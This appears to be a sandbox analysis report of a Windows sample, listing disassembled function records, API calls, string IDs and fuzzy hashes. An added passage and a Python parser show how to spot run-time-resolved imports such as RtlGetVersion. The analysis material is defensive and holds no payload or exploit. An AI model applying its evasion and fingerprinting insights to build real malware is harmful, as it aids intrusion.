                    • Opcode Fuzzy Hash: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
                    • Instruction Fuzzy Hash: 0762AD71A047129FC718CF18C59066AB7E1FFC8304F144A3EE8969BB81D778E959CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID: hAA
                    • API String ID: 0-1362906312
                    • Opcode ID: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
                    • Instruction ID: f848a90908651b5095397da3da739fda65f55eeb17523120767d540d1063a6f3
                    • Opcode Fuzzy Hash: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
                    • Instruction Fuzzy Hash: F0D1E7716083828FC704CF28C48066ABBE2FFD9304F144A6EE9D58B752D379D98ACB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(004011DA,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 00409FD6
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                    • Instruction ID: ac8206da82d6392f4af85a502d91db7afc58579d845f6d3a682825b86ab87252
                    • Opcode Fuzzy Hash: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
                    • Instruction Fuzzy Hash: 68B0017A404180EFDB015F20ED4C7C63FB2B746745FD08AB8980181770CB790496DA0C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                    • Instruction ID: 434e224409ee4b41571aafdaecae1a236b293988db59150c8aad3205160540e2
                    • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                    • Instruction Fuzzy Hash: 3E12C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
                    • Instruction ID: ce7637385bf2580d4bd45f7eed7cd981386548e1214f237c7f2b1e334cab5801
                    • Opcode Fuzzy Hash: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
                    • Instruction Fuzzy Hash: B381B472620852CBE718CF1DEC907B63353E7C9340F99C639DA028779AE538B562C795
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
                    • Instruction ID: eb62069f37237363b8ce6edce14327945305ce31afdb1d79ed38a397900698d6
                    • Opcode Fuzzy Hash: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
                    • Instruction Fuzzy Hash: 0A71F3F16205824BD714CF29FCD067673A2EBD9384F4AC639DB0287396C238B971C695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                    • Instruction ID: af0191558bb113c69bf01aa77dc2a624928e07331dce5fde3109ee2fd9e39919
                    • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                    • Instruction Fuzzy Hash: 5941EA32A4474547E728CF28C8553EFB390AB88304F45493ECB9697B60CB6EE9C68685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                    • Instruction ID: 72b98655ba701b9d964f93d3241bb8f545428b910a5ae8810ed1e036a2f8a9ba
                    • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                    • Instruction Fuzzy Hash: AD31DC32E447854BE728CF28C8953EB7390BB88304F49093FCB4697BA1C66AE9C5C645
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                    • Instruction ID: 87db66efce333c178885a799e057bc316407fa68a453293863d00c93a718f179
                    • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                    • Instruction Fuzzy Hash: D121BB32A447450BE728CB28D8953FBB390AB88304F49493FCB5687BA1C66AD9C5C644
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                      • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                      • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                    • GetStockObject.GDI32(00000011), ref: 00408FB2
                    • LoadIconW.USER32 ref: 00408FE9
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                    • RegisterClassExW.USER32 ref: 00409021
                    • IsWindowEnabled.USER32(00000000), ref: 00409048
                    • EnableWindow.USER32(00000000), ref: 00409059
                    • GetSystemMetrics.USER32(00000001), ref: 00409091
                    • GetSystemMetrics.USER32(00000000), ref: 0040909E
                    • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                    • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                    • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                    • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                    • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                    • wcslen.MSVCRT ref: 00409189
                    • wcslen.MSVCRT ref: 00409191
                    • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                    • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                    • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                    • SetForegroundWindow.USER32(00000000), ref: 0040921F
                    • BringWindowToTop.USER32(00000000), ref: 00409226
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                    • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                    • TranslateMessage.USER32(?), ref: 00409259
                    • DispatchMessageW.USER32(?), ref: 00409264
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                    • wcslen.MSVCRT ref: 00409289
                    • wcscpy.MSVCRT ref: 004092A1
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                    • String ID: 0$BUTTON$D0A$EDIT$STATIC
                    • API String ID: 54849019-2968808370
                    • Opcode ID: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
                    • Opcode Fuzzy Hash: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                      • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                      • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
                      • Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
                      • Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                    • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
                    • API String ID: 1295435411-2952853158
                    • Opcode ID: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
                    • Opcode Fuzzy Hash: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A
                    • memset.MSVCRT ref: 00409381
                    • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                    • wcsncpy.MSVCRT ref: 004093DD
                    • wcslen.MSVCRT ref: 004093F1
                    • CoTaskMemFree.OLE32(?), ref: 0040947A
                    • wcslen.MSVCRT ref: 00409481
                    • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                    • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                    • API String ID: 4193992262-92458654
                    • Opcode ID: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
                    • Opcode Fuzzy Hash: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A
                    Uniqueness

                    Uniqueness Score: -1.00%
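Two things an analyst wants from the function records above are tedious to read off by hand: which imports a function resolves at run time (GetProcAddress with a literal name, as subcall 0040552C does for RtlGetVersion and the function at 00409373 does for the SHELL32 folder-browser exports), since those names never appear in the PE import table and so escape static import-based triage, and which records share an API String ID. Resolving RtlGetVersion this way is also worth noting on its own: GetVersionExW returns a compatibility-shimmed version on Windows 8.1 and later, while RtlGetVersion reports the real one, so this pattern is how both installers and malware fingerprint the true OS. The following Python is an added example written for this page, not Joe Sandbox code; the sample text is trimmed copies of four records from this report, and the line regexes are my assumptions about the rendered layout, not a documented format.

```python
"""Triage helper for Joe Sandbox function records in the "APIs" / "Similarity" layout.

Added example, not Joe Sandbox code.  Parses each record, extracts every API
call (including "Part of subcall" lines), lists imports resolved at run time
via GetProcAddress, and groups records that share an API String ID.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: trimmed copies of four records from this report.
SAMPLE_RECORDS = """\
APIs
• GetVersionExW.KERNEL32(?), ref: 00405593
  • Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
  • Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
  • Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
• GetVersionExW.KERNEL32(?), ref: 004055F2
Similarity
• API ID: Version$AddressHandleModuleProcmemset
• API String ID: 3445250173-0
Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000), ref: 00409373
• LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
• FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
Similarity
• API String ID: 4193992262-92458654
Uniqueness Score: -1.00%

Strings
Similarity
• String ID: hAA
• API String ID: 0-1362906312
Uniqueness Score: -1.00%

Strings
Similarity
• String ID: hAA
• API String ID: 0-1362906312
Uniqueness Score: -1.00%
"""

# Assumed layout: "• [Part of subcall function XXXXXXXX: ]Api.MODULE[(args)], ref: XXXXXXXX"
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
_API_STRING_ID_RE = re.compile(r"^\s*•\s*API String ID:\s*(?P<id>\S+)")
# Hex immediates, '?' (unresolved) and empty slots are not string literals.
_NON_STRING_ARG_RE = re.compile(r"^(-?[0-9A-F]{8}|\?|)$")
_LOADERS = {"LoadLibraryW", "LoadLibraryA", "GetModuleHandleW", "GetModuleHandleA"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the subcall the sandbox attributed it to

    def string_args(self) -> List[str]:
        """Arguments the sandbox rendered as literal strings."""
        return [a for a in self.args if not _NON_STRING_ARG_RE.match(a)]


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_string_id: str = ""

    def api_names(self) -> List[str]:
        return [c.api for c in self.calls]

    def loaded_modules(self) -> List[str]:
        """DLL names passed to LoadLibrary*/GetModuleHandle* as literals."""
        return [a for c in self.calls if c.api in _LOADERS for a in c.string_args()]

    def resolved_imports(self) -> List[str]:
        """Names passed to GetProcAddress as literals: run-time imports absent from the import table."""
        return [c.args[1] for c in self.calls
                if c.api == "GetProcAddress" and len(c.args) >= 2
                and not _NON_STRING_ARG_RE.match(c.args[1])]


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into records; each ends at its 'Uniqueness Score' line."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        stripped = line.strip()
        if current is None:
            if stripped in ("APIs", "Strings", "Memory Dump Source"):
                current = FunctionRecord()
            continue
        if stripped.startswith("Uniqueness Score"):
            records.append(current)
            current = None
            continue
        m = _CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
            continue
        m = _API_STRING_ID_RE.match(line)
        if m:
            current.api_string_id = m.group("id")
    return records


def index_by_api_string_id(records: List[FunctionRecord]) -> Dict[str, List[FunctionRecord]]:
    """Group records sharing an API String ID (same API/string profile, different code)."""
    idx: Dict[str, List[FunctionRecord]] = defaultdict(list)
    for r in records:
        idx[r.api_string_id].append(r)
    return dict(idx)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        if r.resolved_imports():
            print(f"{r.api_string_id}: loads {r.loaded_modules()} and resolves {r.resolved_imports()}")
    for sid, group in index_by_api_string_id(recs).items():
        if len(group) > 1:
            print(f"{len(group)} records share API String ID {sid}")
```

Run over the full report text, the resolved-import list is the quickest way to see capabilities the static import table hides; on this page that is RtlGetVersion (OS fingerprinting), the SHELL32 folder-browser pair and SHGetKnownFolderPath (path selection for the drop location).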

                    APIs
                    • wcsncpy.MSVCRT ref: 00406405
                      • Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A
                    • _wcsdup.MSVCRT ref: 0040644E
                    • _wcsdup.MSVCRT ref: 00406469
                    • _wcsdup.MSVCRT ref: 0040648C
                    • wcsncpy.MSVCRT ref: 00406578
                    • free.MSVCRT(?), ref: 004065DC
                    • free.MSVCRT(?), ref: 004065EF
                    • free.MSVCRT(?), ref: 00406602
                    • wcsncpy.MSVCRT ref: 0040662E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsdupfreewcsncpy$Value
                    • String ID: $0A$$0A$$0A
                    • API String ID: 1554701960-360074770
                    • Opcode ID: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
                    • Opcode Fuzzy Hash: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
                    • wcscpy.MSVCRT ref: 0040AF1B
                    • wcscat.MSVCRT ref: 0040AF26
                    • wcslen.MSVCRT ref: 0040AF2C
                    • CoTaskMemFree.OLE32(?,00000000,00000000,?,02209F70,00000000,00000000), ref: 0040AF3A
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
                    • wcscat.MSVCRT ref: 0040AF59
                    • wcslen.MSVCRT ref: 0040AF5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
                    • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                    • API String ID: 1878685483-287042676
                    • Opcode ID: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
                    • Opcode Fuzzy Hash: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
                    • InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
                    • TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
